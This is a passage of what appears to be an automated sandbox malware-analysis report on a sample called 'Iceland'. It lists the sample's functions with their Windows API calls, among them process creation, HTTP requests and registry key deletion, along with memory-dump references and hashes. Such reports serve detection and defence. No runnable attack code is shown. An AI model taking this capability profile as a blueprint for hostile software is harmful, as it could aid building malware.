                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                                                                                                                                                                                • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                                                                                                                                • API String ID: 2055661098-1000479233
                                                                                                                                                                                                                                                                • Opcode ID: 6a0bee1d61e480a7f665caa4c0ffd51c0b26a704edf92fe0c304fc03771777d6
                                                                                                                                                                                                                                                                • Instruction ID: 24bfed001a1a25c9f94de35f834dd2401eb27ef3b1c59ba96be136e08c6d5c76
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6a0bee1d61e480a7f665caa4c0ffd51c0b26a704edf92fe0c304fc03771777d6
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A8B10431B087029FCB10EF38D992A6EB7E5BF94720F104A2DF59687291DB30D845CB92
                                                                                                                                                                                                                                                                Function 00AABA59 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00AABBF8
                                                                                                                                                                                                                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00AABC10
                                                                                                                                                                                                                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00AABC34
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00AABC60
                                                                                                                                                                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00AABC74
                                                                                                                                                                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00AABC96
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00AABD92
                                                                                                                                                                                                                                                                  • Part of subcall function 00A90F4E: GetStdHandle.KERNEL32(000000F6), ref: 00A90F6D
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00AABDAB
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00AABDC6
                                                                                                                                                                                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00AABE16
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000), ref: 00AABE67
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00AABE99
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00AABEAA
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00AABEBC
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00AABECE
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00AABF43
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2178637699-0
                                                                                                                                                                                                                                                                • Opcode ID: c4712e13f6a0bb4f550cf420c96f65aa9df523ca9de8ad3580d1bd55c003ed39
                                                                                                                                                                                                                                                                • Instruction ID: 30c3745dbf48bfc5165b2d7a89f508467d2ff27c4e6a1fdd3113891e911135a4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c4712e13f6a0bb4f550cf420c96f65aa9df523ca9de8ad3580d1bd55c003ed39
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4FF1BF716143409FC714EF28C991B6ABBE5BF89310F18896DF4858B2E2DB31DC41CB62
                                                                                                                                                                                                                                                                Function 00AA4A46 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 478libraryloaderCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00ABDCD0), ref: 00AA4B18
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00AA4B2A
                                                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,00ABDCD0), ref: 00AA4B4F
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00ABDCD0), ref: 00AA4B9B
                                                                                                                                                                                                                                                                • StringFromGUID2.OLE32(?,?,00000028,?,00ABDCD0), ref: 00AA4C05
                                                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000009), ref: 00AA4CBF
                                                                                                                                                                                                                                                                • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00AA4D25
                                                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 00AA4D4F
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                                                                                                                                                                                                                                • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                                                                                                                                                • API String ID: 354098117-199464113
                                                                                                                                                                                                                                                                • Opcode ID: 2b9bb5d9b73c723fc7c1821687c1e83e00223229015a805905ac63d907b50df5
                                                                                                                                                                                                                                                                • Instruction ID: 1af7d017f2b95921c365f4742d4cb15a51b481a71e7b8200457281147ef04d98
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2b9bb5d9b73c723fc7c1821687c1e83e00223229015a805905ac63d907b50df5
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8F124E71A00115EFDB14DF94C884EAEBBB5FF8A714F148098F9099B2A1D771ED46CBA0
                                                                                                                                                                                                                                                                Function 00A2381F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetMenuItemCount.USER32(00AF29C0), ref: 00A63F72
                                                                                                                                                                                                                                                                • GetMenuItemCount.USER32(00AF29C0), ref: 00A64022
                                                                                                                                                                                                                                                                • GetCursorPos.USER32(?), ref: 00A64066
                                                                                                                                                                                                                                                                • SetForegroundWindow.USER32(00000000), ref: 00A6406F
                                                                                                                                                                                                                                                                • TrackPopupMenuEx.USER32(00AF29C0,00000000,?,00000000,00000000,00000000), ref: 00A64082
                                                                                                                                                                                                                                                                • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00A6408E
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                                                                • API String ID: 36266755-4108050209
                                                                                                                                                                                                                                                                • Opcode ID: 2ee9b889bffda5e6d0ef9d189f73cd5f160f7b8c3a268989e0fd29f83bee2572
                                                                                                                                                                                                                                                                • Instruction ID: 561527546e70503e41c7ba6be897915cba6c8df442b516807ffd2b6f860b076d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2ee9b889bffda5e6d0ef9d189f73cd5f160f7b8c3a268989e0fd29f83bee2572
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D2711532644215BFEF219F69DC49FAABFB8FF05364F100226F6146A1E1D7B5A910CB50
                                                                                                                                                                                                                                                                Function 00AB7711 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • DestroyWindow.USER32(00000000,?), ref: 00AB7823
                                                                                                                                                                                                                                                                  • Part of subcall function 00A28577: _wcslen.LIBCMT ref: 00A2858A
                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00AB7897
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00AB78B9
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00AB78CC
                                                                                                                                                                                                                                                                • DestroyWindow.USER32(?), ref: 00AB78ED
                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00A20000,00000000), ref: 00AB791C
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00AB7935
                                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 00AB794E
                                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000), ref: 00AB7955
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00AB796D
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00AB7985
                                                                                                                                                                                                                                                                  • Part of subcall function 00A22234: GetWindowLongW.USER32(?,000000EB), ref: 00A22242
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                                                                                                                                                                                                • String ID: 0$tooltips_class32
                                                                                                                                                                                                                                                                • API String ID: 2429346358-3619404913
                                                                                                                                                                                                                                                                • Opcode ID: 8ea48739d78826fcca57cd77e86f66fd58437634339de6fc401a785e860f09b8
                                                                                                                                                                                                                                                                • Instruction ID: f2f308a6c46ec2ff7e09380538bd49c6e1a30eb4aac81d2c69b3635816ff4e4e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8ea48739d78826fcca57cd77e86f66fd58437634339de6fc401a785e860f09b8
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2E718870108245AFD725CF98CC48FAABBF9FBC9304F04455DF995872A2DBB0A946CB11
                                                                                                                                                                                                                                                                Function 00AB9B7A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfileCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00A224B0
                                                                                                                                                                                                                                                                • DragQueryPoint.SHELL32(?,?), ref: 00AB9BA3
                                                                                                                                                                                                                                                                  • Part of subcall function 00AB80AE: ClientToScreen.USER32(?,?), ref: 00AB80D4
                                                                                                                                                                                                                                                                  • Part of subcall function 00AB80AE: GetWindowRect.USER32(?,?), ref: 00AB814A
                                                                                                                                                                                                                                                                  • Part of subcall function 00AB80AE: PtInRect.USER32(?,?,?), ref: 00AB815A
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 00AB9C0C
                                                                                                                                                                                                                                                                • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00AB9C17
                                                                                                                                                                                                                                                                • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00AB9C3A
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00AB9C81
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 00AB9C9A
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 00AB9CB1
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 00AB9CD3
                                                                                                                                                                                                                                                                • DragFinish.SHELL32(?), ref: 00AB9CDA
                                                                                                                                                                                                                                                                • DefDlgProcW.USER32(?,00000233,?,00000000), ref: 00AB9DCD
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                                                                                                                                                                                                • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                                                                                                                                                                • API String ID: 221274066-3440237614
                                                                                                                                                                                                                                                                • Opcode ID: f50f423a1eac5d2d3b059b8c698ea9f77830c55f461d7a80657198f63a7d59f7
                                                                                                                                                                                                                                                                • Instruction ID: 3d59378c1ca7476dc99ba027d00853cebbdc18e2e5b40f282b36662a088e8404
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f50f423a1eac5d2d3b059b8c698ea9f77830c55f461d7a80657198f63a7d59f7
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CC617B71108301AFC705EF94DD85EAFBBE8FF88750F000A2DF691961A2DB709A49CB52
                                                                                                                                                                                                                                                                Function 00A9CEBB Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00A9CEF5
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00A9CF08
                                                                                                                                                                                                                                                                • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00A9CF1C
                                                                                                                                                                                                                                                                • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00A9CF35
                                                                                                                                                                                                                                                                • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00A9CF78
                                                                                                                                                                                                                                                                • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00A9CF8E
                                                                                                                                                                                                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00A9CF99
                                                                                                                                                                                                                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00A9CFC9
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00A9D021
                                                                                                                                                                                                                                                                • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00A9D035
                                                                                                                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00A9D040
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3800310941-3916222277
                                                                                                                                                                                                                                                                • Opcode ID: 8634cdbcb7f37f8f155da26cf04bf7cfb637f0568c26fc3bf21e178265a2dd65
                                                                                                                                                                                                                                                                • Instruction ID: 80a5f6d68ede5542ee176246049e21a472c4ba21303cf166ca485baac09b6bed
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8634cdbcb7f37f8f155da26cf04bf7cfb637f0568c26fc3bf21e178265a2dd65
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EA516DB5600704BFDB21DFA0C988AAB7BFCFF08794F004519F94696251EB34D9859B60
                                                                                                                                                                                                                                                                Function 00AB8FCB Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00AB66D6,?,?), ref: 00AB8FEE
                                                                                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00AB66D6,?,?,00000000,?), ref: 00AB8FFE
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00AB66D6,?,?,00000000,?), ref: 00AB9009
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,00AB66D6,?,?,00000000,?), ref: 00AB9016
                                                                                                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00AB9024
                                                                                                                                                                                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00AB66D6,?,?,00000000,?), ref: 00AB9033
                                                                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00AB903C
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,00AB66D6,?,?,00000000,?), ref: 00AB9043
                                                                                                                                                                                                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00AB66D6,?,?,00000000,?), ref: 00AB9054
                                                                                                                                                                                                                                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,00AC0C04,?), ref: 00AB906D
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00AB907D
                                                                                                                                                                                                                                                                • GetObjectW.GDI32(00000000,00000018,?), ref: 00AB909D
                                                                                                                                                                                                                                                                • CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 00AB90CD
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00AB90F5
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00AB910B
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3840717409-0
                                                                                                                                                                                                                                                                • Opcode ID: 30c6285aa688eb4528bfaad7f2fdb8f682b7f9595eda01953f82165602226a9c
                                                                                                                                                                                                                                                                • Instruction ID: 6dfe5fe0377087bfb6c70f2a632a2bfdb50c9cb41379f2aeca152d162e3a296b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 30c6285aa688eb4528bfaad7f2fdb8f682b7f9595eda01953f82165602226a9c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E6411675600209BFDB11DFA9DC88EAB7BBCEB89715F108158F905DB262E7309942DB20
                                                                                                                                                                                                                                                                Function 00AAC06E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2B329: _wcslen.LIBCMT ref: 00A2B333
                                                                                                                                                                                                                                                                  • Part of subcall function 00AAD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00AAC10E,?,?), ref: 00AAD415
                                                                                                                                                                                                                                                                  • Part of subcall function 00AAD3F8: _wcslen.LIBCMT ref: 00AAD451
                                                                                                                                                                                                                                                                  • Part of subcall function 00AAD3F8: _wcslen.LIBCMT ref: 00AAD4C8
                                                                                                                                                                                                                                                                  • Part of subcall function 00AAD3F8: _wcslen.LIBCMT ref: 00AAD4FE
                                                                                                                                                                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00AAC154
                                                                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00AAC1D2
                                                                                                                                                                                                                                                                • RegDeleteValueW.ADVAPI32(?,?), ref: 00AAC26A
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00AAC2DE
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00AAC2FC
                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00AAC352
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00AAC364
                                                                                                                                                                                                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00AAC382
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00AAC3E3
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00AAC3F4
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                                                                                                                                                                                                • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                                                                • API String ID: 146587525-4033151799
                                                                                                                                                                                                                                                                • Opcode ID: b720e4c72e608b4299ad2f2526a4b5fb6dff20cef4ce086509898fb9aa80cc96
                                                                                                                                                                                                                                                                • Instruction ID: ee8c71b52d122d64a4064c94326c72a3353f1d9d8d64b5e8a1c15e0cd7620f02
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b720e4c72e608b4299ad2f2526a4b5fb6dff20cef4ce086509898fb9aa80cc96
